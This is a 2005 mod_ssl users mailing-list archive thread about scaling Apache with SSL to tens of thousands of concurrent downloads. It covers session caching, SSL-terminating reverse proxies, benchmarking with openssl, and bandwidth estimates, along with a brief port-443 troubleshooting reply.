	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pigeon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello, I am trying to plan a system that can handle 10k-100k users.

I am only using apache w/mod-ssl

What should I look at to reduce overhead of bandwidth/cpu/mem?

At what point should I look at ssl accelerators?

Should I definitly look at clustering?

Also.. I ahve heard about ssl session key caching, anyone know how much this 
will improve things?

Any good resources I can read?


thanks!
Lee 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 14:42:47 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BA6A914D84C; Mon, 26 Sep 2005 14:42:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pfepa.post.tele.dk (pfepa.post.tele.dk [195.41.46.235])
	by master.modssl.org (Postfix) with ESMTP id 8DE9514D82A
	for ; Mon, 26 Sep 2005 14:42:47 +0200 (CEST)
Received: from strandbygaard.net (0x50c72f98.adsl-fixed.tele.dk [80.199.47.152])
	by pfepa.post.tele.dk (Postfix) with SMTP id 7D4E047FE5C
	for ; Mon, 26 Sep 2005 14:42:45 +0200 (CEST)
Received: (qmail 7557 invoked from network); 26 Sep 2005 12:43:07 -0000
Received: from mac.strandbygaard.net (HELO ?10.0.2.2?) (10.0.2.2)
  by 0 with SMTP; 26 Sep 2005 12:43:07 -0000
In-Reply-To: <06e501c5c296$b8334d60$02fea8c0@desktop>
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>
Mime-Version: 1.0 (Apple Message framework v734)
X-Priority: 3
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: <3FEE244F-E5E5-46D7-A832-3C4ACD95F8AC@strandbygaard.net>
Content-Transfer-Encoding: 7bit
From: Martin Strandbygaard 
Subject: Re: Mod_ssl and how to reduce overhead
Date: Mon, 26 Sep 2005 14:42:43 +0200
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.734)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin Strandbygaard 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

A few words about intended usage would be of great help.

- How many concurrent users
- Type of transactions
- You really think the http front is going to be you bottle neck? or  
are there back end systems that will pose a greater problem (I would  
think so)

Why not just use a normal server as ssl accelerator? I know several  
SSL accelerator "appliancees" that are just that anyway. Unless you  
have specific keyhandling requirements (FIPS140-3 or something),  
using normal server hardware is much cheaper.

regards
martin

On 26/09/2005, at 14.35, Pigeon wrote:

> Hello, I am trying to plan a system that can handle 10k-100k users.
>
> I am only using apache w/mod-ssl
>
> What should I look at to reduce overhead of bandwidth/cpu/mem?
>
> At what point should I look at ssl accelerators?
>
> Should I definitly look at clustering?
>
> Also.. I ahve heard about ssl session key caching, anyone know how  
> much this will improve things?
>
> Any good resources I can read?
>
>
> thanks!
> Lee  
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 14:50:03 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2B08814D84C; Mon, 26 Sep 2005 14:50:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orb.pobox.com (orb.pobox.com [207.8.226.5])
	by master.modssl.org (Postfix) with ESMTP id E502614D82A
	for ; Mon, 26 Sep 2005 14:50:02 +0200 (CEST)
Received: from orb (localhost [127.0.0.1])
	by orb.pobox.com (Postfix) with ESMTP id 4C2771DEC
	for ; Mon, 26 Sep 2005 08:50:23 -0400 (EDT)
Received: from [6.41.52.192] (wormhole.crcnet1.com [65.211.127.5])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by orb.sasl.smtp.pobox.com (Postfix) with ESMTP id 3C3B8A0
	for ; Mon, 26 Sep 2005 08:50:22 -0400 (EDT)
Message-ID: <4337EEAD.8000803@w3works.com>
Date: Mon, 26 Sep 2005 08:50:53 -0400
From: Dave paris 
User-Agent: Mozilla Thunderbird 1.0.6 (Macintosh/20050716)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Mod_ssl and how to reduce overhead
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>
In-Reply-To: <06e501c5c296$b8334d60$02fea8c0@desktop>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I use Pound (http://www.apsis.ch/pound/) as an SSL-terminating reverse 
proxy .. on commodity hardware, it can handle - at least according to 
quotes from the field - up to around 400 conns/sec.  It also affords you 
some additional firewalling in that you can put the SSL terminating 
accelerator in the DMZ and pass straight HTTP traffic to the backend 
without the client ever directly connecting to the web server/cluster.

I also use keepalived to keep a pair of Pound proxies in a 
high-availability scenario.  If you really need it, you could probably 
put up a HA/LVS cluster of Pound proxies up that terminate and proxy 
traffic for an entire web farm - if your traffic demands it.

The other bonus is that by terminating SSL at the DMZ, your IDS/IPS 
system gets a chance to peek at the traffic.

Pound does numerous other things as well (URL normalization, etc) .. 
head to the URL and have a good read.

Best~
-d

Pigeon wrote:
> Hello, I am trying to plan a system that can handle 10k-100k users.
> 
> I am only using apache w/mod-ssl
> 
> What should I look at to reduce overhead of bandwidth/cpu/mem?
> 
> At what point should I look at ssl accelerators?
> 
> Should I definitly look at clustering?
> 
> Also.. I ahve heard about ssl session key caching, anyone know how much 
> this will improve things?
> 
> Any good resources I can read?
> 
> 
> thanks!
> Lee ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 14:54:32 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BEC1514D84C; Mon, 26 Sep 2005 14:54:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.202])
	by master.modssl.org (Postfix) with ESMTP id 59F5614D82A
	for ; Mon, 26 Sep 2005 14:54:31 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h31so1299928wxd
        for ; Mon, 26 Sep 2005 05:54:31 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=uK7hnQbsrFuQfrC5I2CBzGA/EPf+CJ6MXaMokdD1kzQre+Qn5fy1V8dHW4bOJcZTFxwYwepAJsbPoicV6V7FT9rHMhqbDzeIKujCyLmx07On1UXtVrRE0hXit+MYZw6HKazVqLy/aOpyfTKb2yAx0VqycakCd6aI/VX3O73ErxE=
Received: by 10.70.63.2 with SMTP id l2mr2299063wxa;
        Mon, 26 Sep 2005 05:54:30 -0700 (PDT)
Received: by 10.70.75.5 with HTTP; Mon, 26 Sep 2005 05:54:30 -0700 (PDT)
Message-ID: 
Date: Mon, 26 Sep 2005 08:54:30 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: Mod_ssl and how to reduce overhead
In-Reply-To: <4337EEAD.8000803@w3works.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>
	 
	 <06e501c5c296$b8334d60$02fea8c0@desktop>
	 <4337EEAD.8000803@w3works.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> Also.. I ahve heard about ssl session key caching, anyone know how much t=
his
> will improve things?

Session caching is more or less essential for any kind of reasonable
SSL performance.  Disabling the session cache will hurt your SSL perf
by perhaps as much as an order of magnitude (roughly speaking -- it's
been a long time since I benchmarked it).

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 15:10:04 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6982B14D84C; Mon, 26 Sep 2005 15:10:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mxsf35.cluster1.charter.net (mxsf35.cluster1.charter.net [209.225.28.160])
	by master.modssl.org (Postfix) with ESMTP id F138A14D82A
	for ; Mon, 26 Sep 2005 15:10:03 +0200 (CEST)
Received: from mxip19a.cluster1.charter.net (mxip19a.cluster1.charter.net [209.225.28.149])
	by mxsf35.cluster1.charter.net (8.12.11/8.12.11) with ESMTP id j8QDA1qQ015383
	for ; Mon, 26 Sep 2005 09:10:01 -0400
Received: from 68-117-211-186.dhcp.athn.ga.charter.com (HELO desktop) (68.117.211.186)
  by mxip19a.cluster1.charter.net with SMTP; 26 Sep 2005 09:10:01 -0400
X-IronPort-AV: i="3.97,146,1125892800"; 
   d="scan'208"; a="1604028904:sNHT21755638"
Message-ID: <070601c5c29b$9ec69120$02fea8c0@desktop>
From: "Pigeon" 
To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop> <3FEE244F-E5E5-46D7-A832-3C4ACD95F8AC@strandbygaard.net>
Subject: Re: Mod_ssl and how to reduce overhead
Date: Mon, 26 Sep 2005 09:10:08 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=response
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pigeon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

We are going to have 10k-100k concurrent users (yeah... )

We are transfering EXE files (no not warez)

I am just trying to get some ideas.. I am concerned about all because I do 
not know what to be concerned about :/

thanks
Lee



----- Original Message ----- 
From: "Martin Strandbygaard" 
To: 
Sent: Monday, September 26, 2005 8:42 AM
Subject: Re: Mod_ssl and how to reduce overhead


> Hi,
>
> A few words about intended usage would be of great help.
>
> - How many concurrent users
> - Type of transactions
> - You really think the http front is going to be you bottle neck? or  are 
> there back end systems that will pose a greater problem (I would  think 
> so)
>
> Why not just use a normal server as ssl accelerator? I know several  SSL 
> accelerator "appliancees" that are just that anyway. Unless you  have 
> specific keyhandling requirements (FIPS140-3 or something),  using normal 
> server hardware is much cheaper.
>
> regards
> martin
>
> On 26/09/2005, at 14.35, Pigeon wrote:
>
>> Hello, I am trying to plan a system that can handle 10k-100k users.
>>
>> I am only using apache w/mod-ssl
>>
>> What should I look at to reduce overhead of bandwidth/cpu/mem?
>>
>> At what point should I look at ssl accelerators?
>>
>> Should I definitly look at clustering?
>>
>> Also.. I ahve heard about ssl session key caching, anyone know how  much 
>> this will improve things?
>>
>> Any good resources I can read?
>>
>>
>> thanks!
>> Lee 
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 15:31:30 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7293D14D86A; Mon, 26 Sep 2005 15:31:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 7A23914D82A
	for ; Mon, 26 Sep 2005 15:31:28 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id D1BE42B54
	for ; Mon, 26 Sep 2005 15:46:28 +0200 (CEST)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr.toftum.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 02617-10 for ;
 Mon, 26 Sep 2005 15:46:18 +0200 (CEST)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id B599E51E0; Mon, 26 Sep 2005 15:46:18 +0200 (CEST)
Date: Mon, 26 Sep 2005 15:46:18 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Mod_ssl and how to reduce overhead
Message-ID: <20050926134618.GG26776@cr>
Mail-Followup-To: modssl-users@modssl.org
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop> <4337EEAD.8000803@w3works.com> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
X-Virus-Scanned: amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Sep 26, 2005 at 08:54:30AM -0400, Cliff Woolley wrote:
> Session caching is more or less essential for any kind of reasonable
> SSL performance.  Disabling the session cache will hurt your SSL perf
> by perhaps as much as an order of magnitude (roughly speaking -- it's
> been a long time since I benchmarked it).
> 
The actual performance benefit is dependent on the usage pattern (mostly
the length of sessions) but fetching a session from the cache is easily
100x faster than negotiating a new session key (again ymmv dependt on
how much spare processing power you have).
Openssl is usefull in at least getting an idea of the order of magnitude
- run openssl speed rsa on the box to figure out how many rsa operations
it can handle concurrently for your chosen keysize.
openssl s_client with the -reconnect option will help determine wheter
session caching is working on the server.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 16:49:45 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 69D6114D872; Mon, 26 Sep 2005 16:49:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cse.snu.ac.kr (cse.snu.ac.kr [147.46.127.34])
	by master.modssl.org (Postfix) with ESMTP id 73D5F14D871
	for ; Mon, 26 Sep 2005 16:49:43 +0200 (CEST)
Received: from [147.47.253.234] ([147.47.253.234])
	(authenticated bits=0)
	by cse.snu.ac.kr (8.13.4/8.13.4/Debian-1) with ESMTP id j8QEnsQd001417
	for ; Mon, 26 Sep 2005 23:49:55 +0900
Mime-Version: 1.0 (Apple Message framework v734)
In-Reply-To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr> 
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: 
Content-Transfer-Encoding: 7bit
From: Bob McKay 
Subject: Re: Re:
Date: Mon, 26 Sep 2005 23:49:41 +0900
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.734)
X-BacchusMilter: Spam Blocker with perl
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bob McKay 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks Cliff; will check it further Wednesday (the server needs to be  
up &
running tomorrow). Thanks for pointing out the udp in the fuser command
(embarrassed grin). I checked tcp just now, nothing listening, but of  
course
that may not be the state when I'm trying to run SSL/apache. The  
other issues -
key info and SSL On - are kind of strange. I'm almost certain I had  
them right in
the fedora httpd configuration gui. Will check again and confirm. If  
it turns out
to be a configuration gui problem, I guess it takes the issue out of  
modssl-users, and
it should go to fedoraforum or similar,
     Thanks and Best WIshes
     Bob

On 26/09/2005, at 21:22, Cliff Woolley wrote:

> It really does sound like there's something else listening on port  
> 443:
>
>
>> "Starting httpd: (98)Address already in use: make_sock: could not
>> bind to address :443
>> no listening sockets available, shutting down"
>>
>
> That's usually what this message means.  You said:
>
>
>> Oh, and there isn't anything else listening to port 443:
>> /sbin/fuser -4 -n udp 443
>> gives a null result.
>>
>
> ... except that it's tcp, not udp, that we care about here.
>
> As for your httpd.conf, it looks sort of close, although the
> ":443>" block needs to have the SSL
> certificate and key configuration directives as well as some other
> stuff (see the example httpd.conf that comes with mod_ssl), and the
> "" block should NOT contain "SSLEngine on".
>
> Hope this helps,
> --Cliff
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 17:28:07 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0832314D84C; Mon, 26 Sep 2005 17:28:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mxsf26.cluster1.charter.net (mxsf26.cluster1.charter.net [209.225.28.226])
	by master.modssl.org (Postfix) with ESMTP id 9F88F14D82A
	for ; Mon, 26 Sep 2005 17:28:06 +0200 (CEST)
Received: from mxip02a.cluster1.charter.net (mxip02a.cluster1.charter.net [209.225.28.132])
	by mxsf26.cluster1.charter.net (8.12.11/8.12.11) with ESMTP id j8QFS46W007304
	for ; Mon, 26 Sep 2005 11:28:04 -0400
Received: from 68-117-211-186.dhcp.athn.ga.charter.com (HELO desktop) ([68.117.211.186])
  by mxip02a.cluster1.charter.net with SMTP; 26 Sep 2005 11:28:04 -0400
X-IronPort-AV: i="3.97,146,1125892800"; 
   d="scan'208"; a="1421593579:sNHT86121368"
Message-ID: <002201c5c2ae$e8120400$02fea8c0@desktop>
From: "Pigeon" 
To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop> 
Subject: Re: Mod_ssl and how to reduce overhead
Date: Mon, 26 Sep 2005 11:28:11 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pigeon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hmm.. 10k -100k are pretty much  guaranteed numbers..

So my main computer crunching will be done at the beginning? (and to relive 
this I can do session key caching.. how long can I cache a key? is this 
'secure'?)  (also.. all transfers will be ~15megs in size)

And using a single server is out of the question?

If we just go with one server.. shouldn't it be something super fast.. amd64 
1gig ram?

thanks!
Lee


>
> On Mon, 26 Sep 2005, Pigeon wrote:
>
>> Hello, I am trying to plan a system that can handle 10k-100k users.
>>
>> I am only using apache w/mod-ssl
>>
>> What should I look at to reduce overhead of bandwidth/cpu/mem?
>>
>> At what point should I look at ssl accelerators?
>>
>> Should I definitly look at clustering?
>>
>> Also.. I ahve heard about ssl session key caching, anyone know how much 
>> this
>> will improve things?
>>
>> Any good resources I can read?
>>
>>
>> thanks!
>> Lee
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 17:51:55 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E53D014D84C; Mon, 26 Sep 2005 17:51:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from thorn.pobox.com (thorn.pobox.com [208.210.124.75])
	by master.modssl.org (Postfix) with ESMTP id 8448414D82A
	for ; Mon, 26 Sep 2005 17:51:54 +0200 (CEST)
Received: from thorn (localhost [127.0.0.1])
	by thorn.pobox.com (Postfix) with ESMTP id 0E353A9
	for ; Mon, 26 Sep 2005 11:42:30 -0400 (EDT)
Received: from [6.114.236.0] (wormhole.crcnet1.com [65.211.127.5])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by thorn.sasl.smtp.pobox.com (Postfix) with ESMTP id F2E2971C
	for ; Mon, 26 Sep 2005 11:42:29 -0400 (EDT)
Message-ID: <4338194E.7070306@w3works.com>
Date: Mon, 26 Sep 2005 11:52:46 -0400
From: Dave paris 
User-Agent: Mozilla Thunderbird 1.0.6 (Macintosh/20050716)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Mod_ssl and how to reduce overhead
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>  <002201c5c2ae$e8120400$02fea8c0@desktop>
In-Reply-To: <002201c5c2ae$e8120400$02fea8c0@desktop>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

In an earlier note, you said that it was 10K-100K *concurrent* users.

a) that's a magnitude of difference, see if you can get better numbers 
from whomever is doing the marketing/project planning.
b) ain't no way you're going to do that many *CONCURRENT* transactions 
on a single box.

-d

Pigeon wrote:
> Hmm.. 10k -100k are pretty much  guaranteed numbers..
> 
> So my main computer crunching will be done at the beginning? (and to 
> relive this I can do session key caching.. how long can I cache a key? 
> is this 'secure'?)  (also.. all transfers will be ~15megs in size)
> 
> And using a single server is out of the question?
> 
> If we just go with one server.. shouldn't it be something super fast.. 
> amd64 1gig ram?
> 
> thanks!
> Lee
> 
> 
>>
>> On Mon, 26 Sep 2005, Pigeon wrote:
>>
>>> Hello, I am trying to plan a system that can handle 10k-100k users.
>>>
>>> I am only using apache w/mod-ssl
>>>
>>> What should I look at to reduce overhead of bandwidth/cpu/mem?
>>>
>>> At what point should I look at ssl accelerators?
>>>
>>> Should I definitly look at clustering?
>>>
>>> Also.. I ahve heard about ssl session key caching, anyone know how 
>>> much this
>>> will improve things?
>>>
>>> Any good resources I can read?
>>>
>>>
>>> thanks!
>>> Lee
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>>
>>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 18:31:12 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1094F14D84C; Mon, 26 Sep 2005 18:31:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail27.sea5.speakeasy.net (mail27.sea5.speakeasy.net [69.17.117.29])
	by master.modssl.org (Postfix) with ESMTP id 667AD14D82A
	for ; Mon, 26 Sep 2005 18:31:10 +0200 (CEST)
Received: (qmail 6617 invoked from network); 26 Sep 2005 16:31:08 -0000
Received: from dsl081-246-226.sfo1.dsl.speakeasy.net (HELO [10.10.1.252]) ([64.81.246.226])
          (envelope-sender )
          by mail27.sea5.speakeasy.net (qmail-ldap-1.03) with SMTP
          for ; 26 Sep 2005 16:31:07 -0000
Mime-Version: 1.0 (Apple Message framework v734)
In-Reply-To: <4338194E.7070306@w3works.com>
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>  <002201c5c2ae$e8120400$02fea8c0@desktop> <4338194E.7070306@w3works.com>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: 
Content-Transfer-Encoding: 7bit
From: Aaron Turner 
Subject: Re: Mod_ssl and how to reduce overhead
Date: Mon, 26 Sep 2005 09:30:46 -0700
To: modssl-users@modssl.org
X-Pgp-Agent: GPGMail 1.1.1 (Tiger)
X-Mailer: Apple Mail (2.734)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aaron Turner 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Not to mention 15MB download * 100K concurrent users is some  
*serious* traffic.  If you're going to be paying that kind of $$$ for  
bandwidth, I hope you've got some cash left over for a load balancer  
and additional web servers.  Some quick (and hopefully accurate) math:

For a T3:
15MB * 1024^2 bytes/MB * 8 bits/byte * 100,000 sessions / (45Mbit/s *  
1024^2 bits/Mbit) / 60 sec/min / 60 min/hour = 74 hours

For a 100Mbps ethernet uplink:
15MB * 1024^2 bytes/MB * 8 bits/byte * 100,000 sessions / (100Mbit/s  
* 1024^2 bits/Mbit) / 60 sec/min / 60 min/hour = 33 hours

And those assume zero overhead for framing and TCP/IP.  Not to  
mention, 100K Apache children/threads running to support all those  
connections (not going to happen).  So yeah, uh, them some serious  
numbers.  You're going to need some serious uplink and hardware (load  
balancer, multiple boxes) to pull this off.

I gotta ask though, just what are you doing where you expect 100K  
people trying to download a 15MB file all at the same time?  You  
working for Microsoft and planning the next security tuesday patch  
update or something? :)

- --
Aaron Turner, Sr. Security Engineer                    

Ph: 408.329.6320          Fax: 408.329.6317


On Sep 26, 2005, at 8:52 AM, Dave paris wrote:

> In an earlier note, you said that it was 10K-100K *concurrent* users.
>
> a) that's a magnitude of difference, see if you can get better  
> numbers from whomever is doing the marketing/project planning.
> b) ain't no way you're going to do that many *CONCURRENT*  
> transactions on a single box.
>
> -d
>
> Pigeon wrote:
>
>> Hmm.. 10k -100k are pretty much  guaranteed numbers..
>> So my main computer crunching will be done at the beginning? (and  
>> to relive this I can do session key caching.. how long can I cache  
>> a key? is this 'secure'?)  (also.. all transfers will be ~15megs  
>> in size)
>> And using a single server is out of the question?
>> If we just go with one server.. shouldn't it be something super  
>> fast.. amd64 1gig ram?
>> thanks!
>> Lee
>>
>>>
>>> On Mon, 26 Sep 2005, Pigeon wrote:
>>>
>>>
>>>> Hello, I am trying to plan a system that can handle 10k-100k users.
>>>>
>>>> I am only using apache w/mod-ssl
>>>>
>>>> What should I look at to reduce overhead of bandwidth/cpu/mem?
>>>>
>>>> At what point should I look at ssl accelerators?
>>>>
